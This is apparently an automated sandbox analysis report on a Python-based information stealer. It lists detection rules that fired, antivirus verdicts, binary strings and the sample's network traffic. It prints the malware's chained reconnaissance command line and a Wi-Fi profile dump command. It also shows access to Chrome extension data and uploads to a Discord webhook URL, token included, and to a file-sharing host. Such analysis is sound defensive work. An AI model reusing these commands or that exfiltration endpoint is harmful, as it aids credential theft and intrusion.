            Source: Process startedAuthor: frack113: Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6468, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 5060, ProcessName: sc.exe
            Sigma detected: Suspicious Execution of Hostname
            Source: Process startedAuthor: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6468, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 672, ProcessName: HOSTNAME.EXE
            Sigma detected: Suspicious Network Command
            Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe, ParentProcessId: 7112, ParentProcessName: SecuriteInfo.com.FileRepMalware.22561.28030.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localg

            Stealing of Sensitive Information

            barindex
            Sigma detected: Capture Wi-Fi password
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe, ParentProcessId: 7112, ParentProcessName: SecuriteInfo.com.FileRepMalware.22561.28030.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 5544, ProcessName: cmd.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeAvira: detection malicious, Label: HEUR/AGEN.1306040
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeReversingLabs: Detection: 50%
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeReversingLabs: Detection: 50%

            Phishing

            barindex
            Overwrites the password of the administrator account
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: Binary string: C:\A\34\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458402101.00007FFDA3AE1000.00000040.00000001.01000000.0000000D.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460538535.00007FFDA5491000.00000040.00000001.01000000.0000000A.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459049746.00007FFDA4161000.00000040.00000001.01000000.0000000B.sdmp
            Source: Binary string: cryptography_rust.pdbc source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: Binary string: C:\A\34\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp
            Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2456611424.00007FFDA32F1000.00000040.00000001.01000000.00000015.sdmp
            Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdb source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: crypto\bn\bn_ctx.cBN_CTX_startBN_CTX_getossl_ec_group_new_excrypto\ec\ec_lib.cEC_GROUP_copyEC_GROUP_set_generatorEC_GROUP_set_curveEC_GROUP_get_curveEC_GROUP_get_degreeEC_GROUP_check_discriminantEC_POINT_newEC_POINT_copyEC_POINT_set_to_infinityEC_POINT_set_Jprojective_coordinates_GFpEC_POINT_set_affine_coordinatesEC_POINT_get_affine_coordinatesEC_POINT_addEC_POINT_dblEC_POINT_invertEC_POINT_is_at_infinityEC_POINT_is_on_curveEC_POINT_cmpEC_POINT_mulEC_GROUP_get_trinomial_basisEC_GROUP_get_pentanomial_basisgroup_new_from_nameossl_ec_group_set_paramsencodingdecoded-from-explicitEC_GROUP_new_from_paramsgeneratorcrypto\evp\digest.cevp_md_ctx_new_exevp_md_ctx_free_algctxevp_md_init_internalEVP_DigestUpdatesizeEVP_DigestFinal_exassertion failed: mdsize <= EVP_MAX_MD_SIZEEVP_DigestFinalXOFxoflenEVP_MD_CTX_copy_exEVP_MD_CTX_ctrlmicalgssl3-msblocksizexofalgid-absentevp_md_from_algorithmupdatecrypto\evp\m_sigver.cUNDEFdo_sigver_initEVP_DigestSignUpdateEVP_DigestVerifyUpdateEVP_DigestSignFinalEVP_DigestSignEVP_DigestVerifyFinalEVP_DigestVerifycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Fri Oct 18 00:15:00 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
            Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\user\tb_digest.cuser_get_digestcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459264735.00007FFDA4331000.00000040.00000001.01000000.00000009.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458028141.00007FFDA3711000.00000040.00000001.01000000.00000007.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_asyncio.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458199558.00007FFDA3A81000.00000040.00000001.01000000.00000012.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\python3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440853445.0000018B46A80000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-1_1"not available source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119754812.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460318251.00007FFDA5471000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457310056.00007FFDA3531000.00000040.00000001.01000000.0000000F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_overlapped.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459813174.00007FFDA4DA1000.00000040.00000001.01000000.00000013.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\python310.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454057077.00007FFD943CE000.00000040.00000001.01000000.00000004.sdmp
            Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
            Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdbhP source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458841393.00007FFDA3FD1000.00000040.00000001.01000000.00000023.sdmp
            Source: Binary string: cryptography_rust.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_uuid.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459552942.00007FFDA4631000.00000040.00000001.01000000.0000001D.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmp

            Spreading

            barindex
            Performs a network lookup / discovery via ARP
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7B2B683C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B69280 FindFirstFileExW,FindClose,0_2_00007FF7B2B69280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7B2B81874
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B69280 FindFirstFileExW,FindClose,2_2_00007FF7B2B69280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7B2B683C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7B2B81874
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D13229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFDB222F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,2_2_00007FFD93D13229
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior

            Networking

            barindex
            Uses netstat to query active network connections and open ports
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
            Source: unknownDNS query: name: ip-api.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /getServer HTTP/1.1Host: api.gofile.ioAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.10.10
            Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.10.10
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: global trafficDNS traffic detected: DNS query: discord.com
            Source: global trafficDNS traffic detected: DNS query: api.gofile.io
            Source: global trafficDNS traffic detected: DNS query: store1.gofile.io
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: unknownHTTP traffic detected: POST /api/webhooks/1298294465534099557/tV90pThPVvQpjF3HTJU-fplHLi0RLPFiHy4H6WFkFos5MS3hw3K64VoD-wO_IKZJNJCs HTTP/1.1Host: discord.comContent-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.10.10Content-Length: 1379
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Mon, 28 Oct 2024 07:20:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
